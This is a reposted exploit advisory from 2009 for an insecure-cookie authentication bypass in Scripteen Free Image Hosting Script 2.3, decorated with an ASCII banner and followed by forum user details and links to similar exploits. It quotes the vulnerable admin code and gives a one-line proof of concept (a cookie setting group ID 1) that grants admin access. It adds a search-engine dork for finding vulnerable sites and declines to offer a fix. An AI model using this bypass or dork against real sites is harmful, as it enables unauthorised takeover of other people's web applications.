- Code:
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
__/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
/QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
|QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
\QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
=Vuln: Scripteen Free Image Hosting Script V2.3 Insecure Cookie Handling
=INFO: http://www.scripteen.com/
=BUY: ---
=Download: http://www.scripteen.com/forum/news-announcements-f2-scripteen-free-image-hosting-script-v2-3-t631.html
=DORK: DORK:"Powered by Scripteen Free Image Hosting Script V 2.3"
____________
_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in ".\admin\header.php"
$userid=$_SESSION['userid'];
$usergid=$_SESSION['usergid'];
if (!$userid || empty($userid) || $userid==""){
$userid = $_COOKIE['cookid'];
$usergid = $_COOKIE['cookgid'];
}
// this is the scripts authentication code, pasted in all admin files.. fail.
if($usergid!="1")
{
header("Location: logout.php"); exit;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
Set:
Cookie: cookgid=1
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
nah
---------------------------------------===--------------------------------------
______________________________________________________________________________
/ \
| ---------------------------------------------------------------------- |
\______________________________________________________________________________/
\ No More Private /
`````````````````
Salamz to All Muslim Hackers.
# milw0rm.com [2009-07-24]
Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln
Foxi- Admin
- Posts : 92
Reputation : -1
Join date : 2009-07-08
» Scripteen Free Image Hosting Script 2.3 SQL Injection Exploit
» Clip Bucket <= 1.7.1 Insecure Cookie Handling Vulnerability
» powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
» Evernew Free Joke Script 1.2 Remote Change Password Exploit
» phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
» Clip Bucket <= 1.7.1 Insecure Cookie Handling Vulnerability
» powerUpload 2.4 (Auth Bypass) Insecure Cookie Handling Vulnerability
» Evernew Free Joke Script 1.2 Remote Change Password Exploit
» phpCollegeExchange 0.1.5c (listing_view.php itemnr) SQL Injection Vuln
|
|